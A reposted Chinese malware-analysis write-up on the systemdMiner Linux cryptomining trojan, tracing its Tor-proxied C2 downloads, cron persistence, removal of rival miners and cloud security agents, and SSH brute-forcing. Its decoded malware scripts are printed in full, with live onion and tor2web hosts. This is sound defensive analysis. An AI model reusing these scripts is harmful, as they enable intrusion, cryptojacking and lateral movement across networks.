设为首页收藏本站
开启辅助访问
对linux挖矿木马systemdMiner的一次应急分析 您所在的位置:网站首页 oppomagisk修补文件img下载 对linux挖矿木马systemdMiner的一次应急分析

对linux挖矿木马systemdMiner的一次应急分析

2023-07-31 20:00| 来源: 网络整理| 查看: 265

一、 背景

本次挖矿木马的应急事件,配合老师给的信息,结合动态分析、静态分析的方法,对该木马进行了深入的分析,初步判断该木马具有持久化、自保护、内网横向移动(SSH爆破)等能力,我们将木马本体及后续通过tor代理下载得到的其他木马脚本整理,对应功能及手法进行分析,具体文档如下。

二、 木马分析

原始拿到的木马脚本为test.sh。首先对test.sh脚本的静态代码审计分析(按照代码执行顺序)

image

首先是设置了脚本执行所需要的环境变量,以及定义了一些变量值,目的为在下边的代码逻辑里进行拼接。

image

sockz()函数是想通过doh来查询ip,利用doh查ip的好处是提供加密保护dns查询结果,既而可以绕过各大厂商IDS里面恶意域名的 IOC。其中红框标注的dns.rubyfish.cn在国内挖矿团队里比较“活跃”,以下是微步在线的搜索结果:

image

初步判断:该挖矿木马是国内的黑产团队搞的。

image

fexe()函数比较简单,在几个目录路径里寻找一个有读写权限的路径。

image

函数u()为该挖矿木马的核心,首先生成了随机文件名,然后通过socket5挂relay.tor2socks.in的代理访问C&C域名,relay.tor2socks.in是一个类似中转网站的域名,这样,C&C域名就不会直接出现在数据包头。根据设备的主机硬件名匹配下载了一个恶意文件/int.$(uname -m),然后执行这个恶意文件并删除该文件。在本脚本文件中,C&C域名为:

wacpnnso4ottxlyvjp2adaieaivxx2saxoymednidp3zyfoqfc5jpqad.onion

tor代理域名为:relay.tor2socks.in

进一步在在微步上查询了该代理域名的详细信息:

image

该脚本执行的方式为crontab计划任务执行,其中变量r,即:

image

该变量记录了目标主机的一些基本信息,包括 ip地址、主机名、crontab内容。这里是 or 的关系,推测是如果执行失败那就上报如上主机信息。

image

流程执行的内容就比较直观了,根据 pid 文件判断程序是否启动了,如果没启动,那么就启动程序。

所以大致流程总结如下:

doh解析域名获取tor代理ip ---> 查找目标主机可读写路径 ---> 通过tor代理在c&c服务器上下载与目标主机硬件版本相匹配的恶意文件 ---> 在目标主机上开启crontab计划任务并执行 ---> 在目标主机上根据pid文件返回脚本执行结果并进行判断。

收集得到可用tor做代理的ip如下:

image.png 2、对挖矿木马函数u()的进一步分析

根据之前对test.sh脚本代码的分析可知,函数u()脚本代码通过tor代理在c2服务器上下载了木马文件并保存到当前目录下,木马文件命名取日期的md5相关值,且执行木马文件之后便立刻删除了该木马文件。代码回顾:

image

从c2服务器上下载并保存木马文件,以供之后的反编译分析使用。从c2服务器上下载下来的木马文件如下:

image

执行该木马文件,结果如下:

(1)crontab定时任务增加了新的一项任务,并且在/root目录下生成了该任务所执行的新脚本文件:systemd-private-2OossFop8vSbHI1fjSzMJoolZfE29S.sh

image

进一步查看该新脚本文件:

image

中间的代码片段用base64加密了,解密得:

image

新脚本文件的代码内容与原脚本文件test.sh代码内容进行对比后,共有两处不同:

1、在新脚本文件代码片段的最前面加入了一串字符串,且该字符串与新脚本文件名类似。

2、新脚本文件中变量$t所指代的c2服务器域名前缀与原来不同

对于第一处不同的地方,作为在脚本文件中,该处存在一处随机字符串的解释可能为该字符串是一个可执行文件名,于是在系统中对该字符串进行了全局搜索:

image

由搜索结果发现,有三个备份的脚本文件,作为后手存在于系统之中。

通过再次对test.sh脚本代码的静态分析可知,crontab任务并不是test.sh发出的,而对crontab任务所执行的脚本内容分析可知,该新脚本文件与test.sh执行的是相同的功能,即通过tor代理从c2服务器上down下木马文件并执行。crontab任务在这里起到了持久化的作用,即持续的从c2服务器上拉取命令。通过对该母体木马文件反编译如下:

将elf文件导入到IDA中发现,函数列表与导入表都几乎没有显示:

image

所以该木马文件很可能是经过加密的,需要单步调试进行分析以获取核心恶意代码。

经过dump之后,跟之前的脚本类似,在样本中内嵌了base64脚本,一共七段:

image

解码后脚本代码内容以及各自所完成的功能如下:

image.png image.png image.png

具体分析如下:

持久化 1.sh: C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) x() { if ! ls $d/.systemd-private-*.sh; then grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash" > $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh touch -r /bin/grep $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh chmod +x $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh fi if ! ls /opt/systemd-private-*.sh; then grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash" > /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh touch -r /bin/grep /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh chmod +x /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh fi if ! ls /etc/cron.d/0systemd-private-*; then grep C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu || echo "$(echo $((RANDOM%59))) * * * * root /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &" > /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu touch -r /bin/grep /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu fi if ! crontab -l | grep ^[0-9] | grep systemd-private; then (echo "$(echo $((RANDOM%59))) * * * * $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &";crontab -l|grep -v systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh)|crontab - fi }

功能:创建定时任务$d/.systemd-private-*.sh。定时任务的内容解码后如下,功能为下载母体木马int文件,以达到本机持久化的目的。

image 自保护、清除其他挖矿木马2.sh: 2OossFop8vSbHI1fjSzMJoolZfE29S exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin find /etc/cron*|xargs chattr -i;find /var/spool/cron*|xargs chattr -i;chattr -i /etc/hosts crontab -l ;grep -iRE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" /etc/cron.*|cut -f 1 -d :|xargs rm -f crontab -l |grep -ivE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" |crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/pgsql"|crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/postgresql"|crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /var/log/postgresql"|crontab - crontab -l |grep -v "[*] [*] [*] [*] [*] /etc/postgresql/"|crontab - grep -q onion /etc/hosts && sed -i '/onion/d' /etc/hosts grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts netstat -antp|grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199"|awk {'print $NF'} |cut -d/ -f1|xargs kill -9 pkill -9 -f "kthreaddi|defunct|./cron|./oka|\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\[stea\]|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpdate|system-python3.8-Updates|java-c|kaudited|kdevtmpfsi|kerberods|khugepageds|kinsing|kintegrityds|kpsmouseds|swapd0|kswaped|knthread|kthreadds|kthrotlds|kw0|kworkerds|kworkre|kwroker|liog|lsof|lopata|Macron|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice|orgfs|pamdicks|pastebin|postgresq1|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|sysguerd|systeamd|systemd-network|sysupdate|sysupdata|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0|zsvc|pdefenderd|smcard2|rcu_sched" ps x |grep -v grep|grep -E "kthreaddi|defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon"|awk '{print $1}' |xargs -I % kill -9 % ss -antp |grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199" |awk -F, {'print $(NF-1)'}|sed 's/pid=//g' |xargs kill -9 rm -f $HOME/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh rm -f /opt/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh ps ax -o "pid %cpu cmd"|grep bash|awk '{if($2>=20.0) print $1}'|xargs kill -

功能:下载脚本卸载安防产品(其中阿里云的安骑士、腾讯云的云镜等产品),同时修改hosts文件屏蔽其他挖矿网址以独占挖矿资源。

下载bot脚本3.sh: 2OossFop8vSbHI1fjSzMJoolZfE29S exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4sSLkA- -m200") t=$(echo "i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad") sockz() { n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch) p=$(echo "dns-query?name=relay.tor2socks.in") s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1) } ibot() { sockz f=/bot r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0) $c -X POST -x socks5h://$s:9050 -e$r $t.onion$f || $c -X POST -e$r $1$f } ibot $t.tor2web.it || ibot $t.tor2web.in

功能:下载bot脚本文件。

目前文件链接已失效,无法down下来进行功能分析:

image 临时文件权限锁定4.sh: chattr -i /tmp/.X11-unix chattr -Ri /tmp/.X11-unix [ -f /tmp/.X11-unix ] && rm -f /tmp/.X11-unix [ -d /tmp/.X11-unix ] || mkdir -p /tmp/.X11-uni

功能:对临时文件进行修改权限锁定。

ssh内网暴力破解5.sh: export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin q=( 1 2 3 4 5 6 7 8 9 ) u(){ f=/${q[$((RANDOM%9))]} x=./$(date|md5sum|cut -f1 -d-) curl -4fsSLkA- -m200 $1$f -o$x chmod +x $x;$x;rm -f $x } u mazeclmhbacucxin.tor2web.in

功能:下载ssh暴力破解的脚本,再由其从c2上拉取对应的ssh爆破木马和密码本以及其他功能性文件,对内网开启ssh服务的机器进行暴力破解。

脚本内容如下(/8与/9文件内容一致):

image

解码得:

export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200") t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd") sockz() { n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch) p=$(echo "dns-query?name=relay.tor2socks.in") s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1) } iscn() { ps aux | grep -v grep | grep tracepath | awk '{print $2}' | xargs kill -9 ; pkill -9 -f tracepath if ! ss -antp |grep tracepath;then f=/sshd mkdir -p /tmp/.X11-unix/sshd && cd /tmp/.X11-unix/sshd || exit ($c -x socks5h://$s:9050 $t.onion$f -o-|| $c $1$f -o-)|tar xz echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 22 root pw 222>/dev/null 2>&1;done' > r1 echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 2222 root pw 222>/dev/null 2>&1;done' > r2 chmod +x *;ulimit -n 60000;>ip;touch -r ss r1 r2 ip n1=$(ip a|awk {'print $2'}|grep ^10[.] |sort -R|head -1|cut -d. -f1,2) n2=$(ip a|awk {'print $2'}|grep ^172[.][1-3]|sort -R|head -1|cut -d. -f1,2) n3=$(ip a|awk {'print $2'}|grep ^192.168|sort -R|head -1|cut -d. -f1,2) [ ! -z "$n3" ] && (./ss -r"OpenSSH" $n3.0.0/16 22 >ip;./r1) [ ! -z "$n2" ] && (./ss -r"OpenSSH" $n2.0.0/16 22 >ip;./r1) [ ! -z "$n1" ] && (./ss -r"OpenSSH" $n1.0.0/12 22 >ip;./r1) #(./ss -r"OpenSSH" 192.168.0.0/16 22 >ip;./r1) #(./ss -r"OpenSSH" 10.0.0.0/16 22 >ip;./r1) #(./ss -r"OpenSSH" 172.16.0.0/12 22 >ip;./r1) (./ss -r"OpenSSH" 10.$((RANDOM%255)).0.0/16 22 >ip;./r1) cd;rm -rf /tmp/.X11-unix/sshd/ fi } sockz iscn $t.tor2web.it &

通过tor代理,拉取/sshd的tar包解压后内容如下(pw+ss+ssh):

image

其中:

pw --> ssh爆破密码字典 ss --> 模拟ss命令的脚本 ssh --> 改写过的sshpass命令脚本 拉取木马所需curl ss6.sh等工具: function kurl() { read proto server path


【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有